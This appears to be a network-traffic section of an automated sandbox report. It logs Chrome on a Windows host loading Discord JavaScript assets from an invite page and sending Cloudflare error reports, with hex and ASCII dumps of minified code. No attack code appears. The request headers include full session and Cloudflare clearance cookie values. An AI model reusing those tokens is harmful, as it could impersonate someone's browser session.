                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1324INData Raw: 61 74 75 73 3a 48 2c 74 65 78 74 42 72 61 6e 64 3a 4c 2c 74 65 78 74 50 6f 73 69 74 69 76 65 3a 5a 2c 74 65 78 74 44 61 6e 67 65 72 3a 77 2c 65 6e 64 44 61 74 65 54 69 6d 65 53 74 72 69 6e 67 3a 41 2c 73 74 61 72 74 44 61 74 65 54 69 6d 65 53 74 72 69 6e 67 3a 62 7d 29 2c 5b 48 2c 4c 2c 5a 2c 77 2c 41 2c 62 5d 29 2c 4d 3d 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 21 3d 44 29 7b 6c 65 74 20 74 3d 28 30 2c 68 2e 48 6f 29 28 44 29 3b 4d 3d 66 2e 69 6e 74 6c 2e 66 6f 72 6d 61 74 54 6f 50 6c 61 69 6e 53 74 72 69 6e 67 28 66 2e 74 2e 48 6d 4b 45 71 61 2c 7b 72 65 63 75 72 72 65 6e 63 65 52 75 6c 65 3a 74 2e 74 6f 54 65 78 74 28 29 7d 29 3b 6c 65 74 20 6e 3d 6f 28 29 28 65 29 3b 4d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 65 2e 74 6f 44 61 74 65
                                                                                                                                                                                                                                                                                    Data Ascii: atus:H,textBrand:L,textPositive:Z,textDanger:w,endDateTimeString:A,startDateTimeString:b}),[H,L,Z,w,A,b]),M=null;if(null!=D){let t=(0,h.Ho)(D);M=f.intl.formatToPlainString(f.t.HmKEqa,{recurrenceRule:t.toText()});let n=o()(e);M=function(t,e){let n=e.toDate


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    109192.168.2.54983035.190.80.14437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC480OUTPOST /report/v4?s=Z%2B8R1Vw7jO8CNTB26TuvtTZyw%2FX%2F9%2BYb2Jtl8c%2Fjygm8rWhImdfyTtR4LvsdH9Qv3jYRSb%2Fc3zlK8L%2FTlJ8HoAvuQhIGPg5qOlJAutjvUdZh%2FSNo5N%2FGBitA31cB HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                    Content-Type: application/reports+json
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC486OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 34 34 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 69 6e 76 69 74 65 2f 42 4e 58 61 35 72 59 46 58 4d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 36 32 2e 31 35 39 2e 31 33 37 2e 32 33 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 63 6f 6e 74 65
                                                                                                                                                                                                                                                                                    Data Ascii: [{"age":1,"body":{"elapsed_time":2445,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://discord.com/invite/BNXa5rYFXM","sampling_fraction":1.0,"server_ip":"162.159.137.232","status_code":200,"type":"http.response.invalid.conte
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    date: Sat, 23 Nov 2024 20:12:49 GMT
                                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    110192.168.2.549831162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1324OUTGET /assets/52015caea7357a7a60a9.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC959INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 168252
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0f8ab658c1b-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "2088cf886851cb41b694b6059102a249"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 13:28:32 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ggt3oJqpKaQlGG9DmSUPNkoRCbWoYR2sfA%2FJZKJVDuMjGV9vKhgahoC9ez8aVrufnIyelMXIify3UF05ERsox2l7vZeEUOt2JMuSpReHOPJC759LlXL3bK3SgLd7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC410INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 31 38 33 38 22 5d 2c 7b 38 36 33 39 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 6e 28 32 32 30 39 32 29 3b 28 30 2c 6e 28 31 39 32 32 39 31 29 2e 65 78 70 6f 72 74 54 79 70 65 64 41 72 72 61 79 53 74 61 74 69 63 4d 65 74 68 6f 64 29 28 22 66 72 6f 6d 22 2c 6e 28 31 32 33 36 37 29 2c 69 29 7d 2c 37 30 35 31 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 37 36 61 34 61 66 35 39 61 61 31 37 33 63 35 31 39 34 36 31 2e 73 76
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["51838"],{863942:function(e,t,n){var i=n(22092);(0,n(192291).exportTypedArrayStaticMethod)("from",n(12367),i)},70519:function(e){e.exports="/assets/76a4af59aa173c519461.sv
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 61 32 64 35 31 61 32 34 64 30 31 34 66 35 32 66 38 33 61 36 2e 70 6e 67 22 7d 2c 31 30 35 30 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 38 39 65 61 30 65 36 32 64 30 66 38 66 66 61 36 37 61 31 37 2e 73 76 67 22 7d 2c 32 36 32 34 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 38 36 37 35 35 66 64 31 64 65 64 61 35 63 62 34 35 35 31 38 2e 73 76 67 22 7d 2c 36 34 30 33 35 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 33 38 38 30 64 63 37 33 64 36 62 65 39 64 39 31 65 66 33 36 2e 73 76 67 22 7d 2c 35 31 35 36 39 35 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                    Data Ascii: exports="/assets/a2d51a24d014f52f83a6.png"},105020:function(e){e.exports="/assets/89ea0e62d0f8ffa67a17.svg"},262467:function(e){e.exports="/assets/86755fd1deda5cb45518.svg"},640356:function(e){e.exports="/assets/3880dc73d6be9d91ef36.svg"},515695:function(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 37 39 36 34 35 29 3b 6f 2e 5a 50 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 3b 6c 65 74 20 65 6e 3d 28 30 2c 44 2e 5a 29 28 4b 2e 5a 29 2c 65 69 3d 28 30 2c 44 2e 5a 29 28 48 2e 5a 29 2c 65 72 3d 28 30 2c 44 2e 5a 29 28 56 2e 5a 29 2c 65 73 3d 28 30 2c 44 2e 5a 29 28 46 2e 5a 29 2c 65 6c 3d 28 30 2c 44 2e 5a 29 28 55 2e 5a 29 2c 65 61 3d 28 30 2c 44 2e 5a 29 28 43 2e 5a 29 2c 65 6f 3d 28 30 2c 44 2e 5a 29 28 71 2e 5a 29 2c 65 63 3d 28 30 2c 44 2e 5a 29 28 77 2e 5a 29 2c 65 75 3d 28 30 2c 44 2e 5a 29 28 4d 2e 5a 29 2c 65 64 3d 28 30 2c 44 2e 5a 29 28 51 2e 5a 29 2c 65 68 3d 28 30 2c 44 2e 5a 29 28 5f 2e 5a 29 2c 65 70 3d 28 30 2c 44 2e 5a 29 28 4a 2e 5a 29 2c 65 67 3d 28 30 2c 44 2e 5a 29 28 47 2e 5a 29 2c 65 6d 3d 28 30 2c 44 2e 5a 29 28 78 2e 5a 29 2c 65 66
                                                                                                                                                                                                                                                                                    Data Ascii: 79645);o.ZP.initialize();let en=(0,D.Z)(K.Z),ei=(0,D.Z)(H.Z),er=(0,D.Z)(V.Z),es=(0,D.Z)(F.Z),el=(0,D.Z)(U.Z),ea=(0,D.Z)(C.Z),eo=(0,D.Z)(q.Z),ec=(0,D.Z)(w.Z),eu=(0,D.Z)(M.Z),ed=(0,D.Z)(Q.Z),eh=(0,D.Z)(_.Z),ep=(0,D.Z)(J.Z),eg=(0,D.Z)(G.Z),em=(0,D.Z)(x.Z),ef
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 3d 3d 28 74 3d 65 2e 69 6e 76 69 74 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 74 61 74 65 29 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 74 68 69 73 2e 70 72 6f 70 73 2e 69 6e 76 69 74 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 73 74 61 74 65 29 26 26 74 68 69 73 2e 6d 61 79 62 65 46 65 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 70 6c 61 73 68 28 29 7d 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 28 29 7b 70 2e 5a 2e 74 65 72 6d 69 6e 61 74 65 28 29 7d 6d 61 79 62 65 46 65 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 70 6c 61 73 68 28 29 7b 6c 65 74 7b 69 6e 76 69 74 65 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 3b 69 66 28 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73
                                                                                                                                                                                                                                                                                    Data Ascii: ==(t=e.invite)||void 0===t?void 0:t.state)!==(null===(n=this.props.invite)||void 0===n?void 0:n.state)&&this.maybeFetchApplicationSplash()}componentWillUnmount(){p.Z.terminate()}maybeFetchApplicationSplash(){let{invite:e}=this.props;if((null==e?void 0:e.s
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 69 6d 70 72 65 73 73 69 6f 6e 4e 61 6d 65 3a 6c 2e 49 6d 70 72 65 73 73 69 6f 6e 4e 61 6d 65 73 2e 55 53 45 52 5f 52 45 47 49 53 54 52 41 54 49 4f 4e 2c 70 61 74 68 3a 24 2e 5a 35 63 2e 52 45 47 49 53 54 45 52 2c 72 65 6e 64 65 72 3a 65 3d 3e 65 65 2e 61 3f 28 30 2c 69 2e 6a 73 78 29 28 65 72 2c 7b 2e 2e 2e 65 2c 72 65 64 69 72 65 63 74 54 6f 3a 74 2c 69 6e 76 69 74 65 4b 65 79 3a 6e 7d 29 3a 28 30 2c 69 2e 6a 73 78 29 28 65 6f 2c 7b 2e 2e 2e 65 2c 72 65 64 69 72 65 63 74 54 6f 3a 74 7d 29 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 70 61 74 68 3a 24 2e 5a 35 63 2e 47 49 46 54 5f 43 4f 44 45 5f 4c 4f 47 49 4e 28 22 3a 67 69 66 74 43 6f 64 65 22 29 2c 72 65 6e 64 65 72 3a 65 3d 3e 28 30 2c 69
                                                                                                                                                                                                                                                                                    Data Ascii: }),(0,i.jsx)(m.Z,{impressionName:l.ImpressionNames.USER_REGISTRATION,path:$.Z5c.REGISTER,render:e=>ee.a?(0,i.jsx)(er,{...e,redirectTo:t,inviteKey:n}):(0,i.jsx)(eo,{...e,redirectTo:t})}),(0,i.jsx)(m.Z,{path:$.Z5c.GIFT_CODE_LOGIN(":giftCode"),render:e=>(0,i
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 2e 2e 65 7d 29 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 70 61 74 68 3a 24 2e 5a 35 63 2e 44 49 53 41 42 4c 45 5f 53 45 52 56 45 52 5f 48 49 47 48 4c 49 47 48 54 5f 4e 4f 54 49 46 49 43 41 54 49 4f 4e 53 2c 72 65 6e 64 65 72 3a 65 3d 3e 28 30 2c 69 2e 6a 73 78 29 28 65 6d 2c 7b 2e 2e 2e 65 7d 29 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 70 61 74 68 3a 24 2e 5a 35 63 2e 41 55 54 48 4f 52 49 5a 45 5f 49 50 2c 72 65 6e 64 65 72 3a 65 3d 3e 28 30 2c 69 2e 6a 73 78 29 28 65 63 2c 7b 2e 2e 2e 65 7d 29 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 70 61 74 68 3a 24 2e 5a 35 63 2e 52 45 4a 45 43 54 5f 49 50 2c 72 65 6e 64 65 72 3a 65 3d 3e 28 30 2c 69 2e 6a 73 78 29 28 65 70 2c 7b 73 6f 75 72 63 65 3a 24 2e 5a 35 63 2e 52 45 4a 45
                                                                                                                                                                                                                                                                                    Data Ascii: ..e})}),(0,i.jsx)(m.Z,{path:$.Z5c.DISABLE_SERVER_HIGHLIGHT_NOTIFICATIONS,render:e=>(0,i.jsx)(em,{...e})}),(0,i.jsx)(m.Z,{path:$.Z5c.AUTHORIZE_IP,render:e=>(0,i.jsx)(ec,{...e})}),(0,i.jsx)(m.Z,{path:$.Z5c.REJECT_IP,render:e=>(0,i.jsx)(ep,{source:$.Z5c.REJE
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 6f 69 64 20 30 2c 6f 3d 6e 75 6c 6c 21 3d 6c 3f 28 30 2c 4e 2e 6d 62 29 28 6c 2c 73 2e 73 65 61 72 63 68 29 3a 61 2c 63 3d 6e 75 6c 6c 3d 3d 72 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 6e 3d 72 2e 70 61 72 61 6d 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 67 69 66 74 43 6f 64 65 2c 75 3d 6e 75 6c 6c 3d 3d 72 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 69 3d 72 2e 70 61 72 61 6d 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 67 75 69 6c 64 54 65 6d 70 6c 61 74 65 43 6f 64 65 3b 72 65 74 75 72 6e 7b 69 6e 76 69 74 65 4b 65 79 3a 6f 2c 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 3a 41 2e 64 65 66 61 75 6c 74 2e 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 28 29 2c 67 69 66 74 43 6f 64 65 3a 63
                                                                                                                                                                                                                                                                                    Data Ascii: oid 0,o=null!=l?(0,N.mb)(l,s.search):a,c=null==r?void 0:null===(n=r.params)||void 0===n?void 0:n.giftCode,u=null==r?void 0:null===(i=r.params)||void 0===i?void 0:i.guildTemplateCode;return{inviteKey:o,isAuthenticated:A.default.isAuthenticated(),giftCode:c
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 6d 2e 53 54 41 52 54 2c 65 29 3a 65 28 29 7d 61 6e 69 6d 61 74 65 54 6f 28 65 2c 74 29 7b 61 2e 5a 2e 73 70 72 69 6e 67 28 74 68 69 73 2e 61 6e 69 6d 2c 7b 74 6f 56 61 6c 75 65 3a 65 2c 2e 2e 2e 66 7d 29 2e 73 74 61 72 74 28 74 29 7d 67 65 74 41 6e 69 6d 61 74 65 64 53 74 79 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 74 61 74 65 2e 73 68 6f 75 6c 64 41 6e 69 6d 61 74 65 3f 7b 6f 70 61 63 69 74 79 3a 74 68 69 73 2e 61 6e 69 6d 2c 74 72 61 6e 73 66 6f 72 6d 3a 65 3f 76 6f 69 64 20 30 3a 5b 7b 73 63 61 6c 65 3a 74 68 69 73 2e 61 6e 69 6d 2e 69 6e 74 65 72 70 6f 6c 61 74 65 28 7b 69 6e 70 75 74 52 61 6e 67 65 3a 5b 30 2c 31 5d 2c 6f 75 74 70 75 74 52 61 6e 67 65 3a 5b 31 2e 30 35 2c 31 5d 7d 29 7d 2c 7b 74 72 61 6e 73 6c 61 74 65 59 3a 74 68 69
                                                                                                                                                                                                                                                                                    Data Ascii: m.START,e):e()}animateTo(e,t){a.Z.spring(this.anim,{toValue:e,...f}).start(t)}getAnimatedStyle(e){return this.state.shouldAnimate?{opacity:this.anim,transform:e?void 0:[{scale:this.anim.interpolate({inputRange:[0,1],outputRange:[1.05,1]})},{translateY:thi
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 2e 44 49 53 41 42 4c 45 5f 53 45 52 56 45 52 5f 48 49 47 48 4c 49 47 48 54 5f 4e 4f 54 49 46 49 43 41 54 49 4f 4e 53 2c 78 2e 5a 35 63 2e 42 49 4c 4c 49 4e 47 5f 50 52 45 4d 49 55 4d 5f 53 55 42 53 43 52 49 42 45 2c 78 2e 5a 35 63 2e 42 49 4c 4c 49 4e 47 5f 50 41 59 4d 45 4e 54 5f 53 4f 55 52 43 45 53 5f 43 52 45 41 54 45 2c 78 2e 5a 35 63 2e 42 49 4c 4c 49 4e 47 5f 50 41 59 4d 45 4e 54 53 2c 78 2e 5a 35 63 2e 42 49 4c 4c 49 4e 47 5f 50 52 45 4d 49 55 4d 5f 53 57 49 54 43 48 5f 50 4c 41 4e 2c 78 2e 5a 35 63 2e 42 49 4c 4c 49 4e 47 5f 47 55 49 4c 44 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 53 5f 50 55 52 43 48 41 53 45 2c 78 2e 5a 35 63 2e 56 45 52 49 46 59 2c 78 2e 5a 35 63 2e 56 45 52 49 46 59 5f 48 55 42 5f 45 4d 41 49 4c 2c 78 2e 5a 35 63 2e 52 45 4a 45
                                                                                                                                                                                                                                                                                    Data Ascii: .DISABLE_SERVER_HIGHLIGHT_NOTIFICATIONS,x.Z5c.BILLING_PREMIUM_SUBSCRIBE,x.Z5c.BILLING_PAYMENT_SOURCES_CREATE,x.Z5c.BILLING_PAYMENTS,x.Z5c.BILLING_PREMIUM_SWITCH_PLAN,x.Z5c.BILLING_GUILD_SUBSCRIPTIONS_PURCHASE,x.Z5c.VERIFY,x.Z5c.VERIFY_HUB_EMAIL,x.Z5c.REJE
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC1369INData Raw: 6e 64 65 72 44 65 66 61 75 6c 74 28 29 7b 6c 65 74 7b 73 70 6c 61 73 68 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 74 3d 28 30 2c 72 2e 6a 73 78 29 28 68 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 73 2e 46 72 61 67 6d 65 6e 74 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 43 68 69 6c 64 72 65 6e 2e 6d 61 70 28 74 68 69 73 2e 70 72 6f 70 73 2e 63 68 69 6c 64 72 65 6e 2c 65 3d 3e 73 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 74 72 61 6e 73 69 74 69 6f 6e 54 6f 3a 66 2e 75 4c 2c 72 65 70 6c 61 63 65 57 69 74 68 3a 66 2e 64 4c 7d 29 29 7d 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 5f 2e 63 68 61 72 61 63 74 65 72 42 61 63 6b 67 72 6f 75 6e 64 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29
                                                                                                                                                                                                                                                                                    Data Ascii: nderDefault(){let{splash:e}=this.props,t=(0,r.jsx)(h.Z,{component:s.Fragment,children:s.Children.map(this.props.children,e=>s.cloneElement(e,{transitionTo:f.uL,replaceWith:f.dL}))});return(0,r.jsx)("div",{className:_.characterBackground,children:(0,r.jsx)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    111192.168.2.549834162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC673OUTGET /assets/771babda7e3dcee4f677.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC958INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 12293
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0fc0cd05e61-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "7f69ddad9c9b8471930a1c320e285dba"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 20:12:27 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HGtBIjrIfXxJaCh3VWzUASTvGvRPL4fcqGxsjpiia5RomMFPf059FG5Tt5DvpCpKkhrubUFq6Cab8QNqWCxkyRmLADK39BSKo6DVarpFaFI2%2BDP6pACmeL3X9mf8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
